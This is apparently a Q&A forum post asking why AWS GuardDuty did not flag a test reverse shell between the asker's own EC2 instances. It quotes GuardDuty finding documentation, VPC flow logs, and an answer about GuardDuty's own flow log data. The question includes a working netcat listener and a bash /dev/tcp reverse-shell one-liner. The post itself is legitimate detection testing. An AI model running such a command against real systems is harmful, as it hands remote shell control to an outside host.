# Why doesn't AWS GuardDuty detect a reverse shell?

Tags: amazon-web-services, amazon-ec2

I ran `nc -nvlp 6666` on an example "attacker" aws EC2 instance and then I ran a bash reverse shell on my EC2 instance monitored by GuardDuty & VPC flowlogs in a public subnet: `bash -i >& /dev/tcp/54.4.4.12/6666 0>&1`

Why doesn't AWS GuardDuty pick this attack up as suspicious using this:

```
Behavior:EC2/NetworkPortUnusual
An EC2 instance is communicating with a remote host on an unusual server port.
Default severity: Medium

Data source: VPC Flow Logs

This finding informs you that the listed EC2 instance in your AWS environment is behaving in a way that deviates from the established baseline. This EC2 instance has no prior history of communications on this remote port.

Note
If the EC2 instance communicated on port 389 or port 1389, then the associated finding severity will be modified to High, and the finding fields will include the following value:

service.additionalInfo.context = Possible log4j callback
```

(Before running reverse shell I had GuardDuty working with VPC flowlogs for 6 days.)

This traffic does exist in flow logs:

```
2022-01-04 08:41:03.000
5 966416534288 eni-XXXXg 172.12.13.6 54.X.X.X 32962 6666 6 5 273 1641278463 1641278522 ACCEPT OK vpc-XXXXX egress


2022-01-04 09:50:09.000 
5 966416534288 eni-XXXXg 172.12.13.6 54.X.X.X 34392 6666 6 6 416 1641282609 1641282665 ACCEPT OK vpc-XXXXX egress


2022-01-04 09:52:07.000
5 966416534288 eni-XXXXg 172.12.13.6 54.X.X.X 34434 6666 6 24 2517 1641282727 1641282785 ACCEPT OK vpc-XXXXX egress
```

Comment: What do the Flow logs say? Can you find the traffic there? Anyway reading the FAQ: https://aws.amazon.com/guardduty/faqs/ Suggest that you dont need to turn on VPC flowlogs yourself GuardDuty should do this on its own. My guess would be that you just dont have enough traffic that has gone through the network for Guardduty to be able to distinguish it.

Comment: Yes VPC flowlogs do show the traffic. I will try the reverse shell traffic again and for longer.

Answer (score 0, accepted):

GuardDuty uses its own copy of Flow Logs for analysis and there is no need to enable it separately from GuardDuty if you don’t need the logs for other purposes. See https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_data-sources.html#guardduty_vpc